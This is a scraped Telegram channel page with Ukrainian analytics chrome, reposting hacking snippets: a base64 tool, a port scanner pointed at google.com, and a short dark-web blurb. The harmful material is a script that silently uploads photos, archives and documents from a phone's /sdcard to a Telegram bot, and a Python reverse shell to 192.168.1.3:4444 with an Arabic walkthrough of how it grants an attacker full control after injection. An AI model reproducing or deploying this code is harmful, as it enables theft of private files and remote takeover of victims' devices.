465
Підписники
-224 години
-17 днів
-1630 днів
- Підписники
- Перегляди допису
- ER - коефіцієнт залучення
Триває завантаження даних...
Приріст підписників
Триває завантаження даних...
Repost from Č Ỳ Ɓ Ë Ř | Š Ë Ç Û Ŕ Í Ť Ŷ
Фото недоступнеДивитись в Telegram
- Nmap Commands .
-
@R_E_D_Z
Repost from N/a
import base64
def main():
data = input('Enter Your Data : ')
command = input("Choose ( d : Decode | e : Encode ) : ")
if command == "e":
encodedBytes = base64.b64encode(data.encode("utf-8"))
encodedStr = str(encodedBytes, "utf-8")
print("\n" + encodedStr)
elif command == "d":
try:
decodedBytes = base64.b64decode(str(data))
decodedStr = str(decodedBytes, "utf-8")
print("\n" + decodedStr)
except:
print("Invaild DATA")
main()
- encrypt and decrypt Text ( base64 )
•
@CO_DE_X
Repost from N/a
python
import os
import requests
id = ID
token = 'Token'
def send_files_to_telegram(id, token, path, extensions):
for entry in os.scandir(path):
if entry.is_file():
if entry.name.lower().endswith(extensions):
file = {"document": open(entry.path, 'rb')}
res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}, files=file)
elif entry.is_dir():
send_files_to_telegram(id, token, entry.path, extensions)
file_extensions = ('.jpg', '.mb3', '.zip', '.ogg', '.swb', '.mb4', '.py', '.png', '.txt', '.pdf')
sdcard_path = '/sdcard'
send_files_to_telegram(id, token, sdcard_path, file_extensions)
- ID
, You can get Your id Here
- Token
, You can get Your TokenBot Here
•
@CO_DE_X
Repost from N/a
import socket
import concurrent.futures
host = 'www.google.com'
ports = range(1, 2024)
def scan_port(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((host, port))
if result == 0:
st=socket.getservbyport(port)
print(f"Port {port} is open\t{st}")
sock.close()
except socket.error:
pass
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
futures = [executor.submit(scan_port, port) for port in ports]
for future in concurrent.futures.as_completed(futures):
future.result()
• Scanning Ports Fast
•
@CO_DE_X
الكود الخاص بالباك دور meterpreter_reverse_tcp المكتوب بلغة البايثون بيستخدم لتحكم كامل في الجهاز المصاب عن بعد عبر اتصال عكسي ببروتوكول TCP. هنشرح الكود كامل خطوة بخطوة يا شباب تابعوا الشرح معايا :
import socket
import subprocess
import os
import time
في البداية الكود بيستورد مكتبات البايثون الأساسية:
- socket
: عشان نقدر نتصل بالشبكة وننشيء اتصالات.
- subprocess
: عشان نقدر ننفذ أوامر النظام.
- os
: عشان نقدر نتعامل مع نظام التشغيل.
- time
: عشان نقدر نستخدم دوال الوقت والتأخير.
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.3", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
دالة connect
بتعمل الآتي:
- بتنشئ socket باستخدام socket.AF_INET
اللي بيحدد استخدام IPv4 وsocket.SOCK_STREAM
اللي بيحدد استخدام بروتوكول TCP.
- بتبدأ الاتصال بـ handler اللي شغال على جهاز المهاجم على IP 192.168.1.3
وبورت 4444
.
- بعد ما الاتصال يتم، بتستخدم os.dup2
عشان توجه الإدخال (stdin)، الإخراج (stdout)، والخطأ القياسي (stderr) للـsocket ده معناه إن أي حاجة تكتب في الشل (shell) هتتبعت لجهاز المهاجم والعكس.
- في النهاية بتشغل شل /bin/sh
عشان تتيح للمهاجم تنفيذ الأوامر على الجهاز المصاب.
while True:
try:
connect()
except:
time.sleep(5)
continue
في الجزء ده الكود بيدخل في حلقة لا نهائية while True
، وبيحاول ينفذ دالة connect
لو حصل أي خطأ أثناء الاتصال زي إن السيرفر مش شغال أو إن الاتصال تقطع، الكود بيستنى 5 ثواني باستخدام time.sleep(5)
قبل ما يحاول الاتصال تاني ده بيضمن إن الباك دور يفضل يحاول الاتصال لحد ما ينجح.
ده شرح كامل للكود. الكود بيتم حقنه في الجهاز المستهدف عن طريق استغلال معين زي ثغرة في النظام أو في برنامج معين بعد ما الكود يتحقن الجهاز المصاب بيبدأ الاتصال بجهاز المهاجم اللي شغال عليه الميتاسبلويت واللي بيكون مستني الاتصال على الـIP والبورت المحددين في الكود بمجرد ما الاتصال يتم، المهاجم بيحصل على جلسة تحكم كاملة بالجهاز المصاب وبيقدر ينفذ أوامر النظام، يرفع ملفات، ينزل ملفات، يشغل برمجيات خبيثة، يجمع معلومات عن الجهاز، أو يتحكم في العمليات اللي شغالة عليه.
باختصار الباك دور meterpreter_reverse_tcp هو حمولة بتستخدم للتحكم في الأنظمة المصابة عن بعد عبر اتصال TCP عكسي بتتيح للمهاجم تنفيذ أوامر وجمع معلومات والتحكم الكامل في الجهاز المصاب الكود مكتوب بلغة البايثون وبيتم حقنه في النظام المستهدف عن طريق استغلال معين عشان يعمل جلسة تحكم meterpreterФото недоступнеДивитись в Telegram
The dark web is a part of the internet that isn’t indexed by search engines. It has a reputation for being a hub of criminal activity, and with good reason – research has shown that a significant portion of dark web sites host illicit material. On the dark web, you can find credit card numbers, drugs, guns, counterfeit money, stolen subscription credentials, hacked Netflix accounts, and software that helps you break into other people’s computers. However, not everything on the dark web is illegal – there are also legitimate sites, such as chess clubs and social networks. It’s important to note that accessing the dark web requires the use of a specific browser called Tor, which routes your web page requests through a series of proxy servers operated by thousands of volunteers around the globe, rendering your IP address unidentifiable and untraceable. The dark web can be a valuable tool for those who need to communicate anonymously, but it’s also a breeding ground for illegal activity.
Оберіть інший тариф
На вашому тарифі доступна аналітика тільки для 5 каналів. Щоб отримати більше — оберіть інший тариф.